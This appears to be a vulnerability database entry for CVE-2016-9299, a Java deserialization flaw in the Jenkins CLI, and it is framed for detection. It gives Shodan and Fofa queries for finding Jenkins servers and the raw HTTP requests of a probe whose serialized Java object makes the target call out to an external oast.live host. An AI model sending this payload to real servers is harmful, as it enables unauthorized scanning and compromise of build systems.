🔙 목록으로 돌아가기

CVE-2016-9299: Jenkins CLI - HTTP Java Deserialization

TitleJenkins CLI - HTTP Java Deserialization
Authoriamnoooob,rootxharsh,pdresearch
SeverityCritical
ImpactAttackers can execute arbitrary code through Java deserialization, potentially leading to complete Jenkins server compromise and unauthorized access to all build systems and secrets.
RemediationUpdate Jenkins to version 2.32 or LTS 2.19.3 or later that fixes the deserialization vulnerability.
CVSS Score9.8
EPSS Score0.86028
CVE IDCVE-2016-9299
CWE IDCWE-90
Shodan Queryproduct:"jenkins"
Fofa Queryicon_hash=81586312
Tags cve cve2016 rce deserialization vkev vuln

🔍 Vulnerability Description

The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.

🌐 HTTP Request

POST /cli HTTP/1.1
Host: www.victim.com
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
POST /cli HTTP/1.1
Host: www.victim.com
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: upload
Content-Type: application/octet-stream
Content-Length: 466

<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=U��srjava.util.HashMap���`�F
loadFactorI	thresholdxp?@wsrjava.net.URL�%76��rIhashCodeIportL	authoritytLjava/lang/String;Lfileq~Lhostq~Lprotocolq~Lrefq~xp��������t-d5jqklple0o44124f8ng1e5jsmd6x571b.oast.live//tq~thttppxt4http://d5jqklple0o44124f8ng1e5jsmd6x571b.oast.live//x

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-9299.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-9299.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A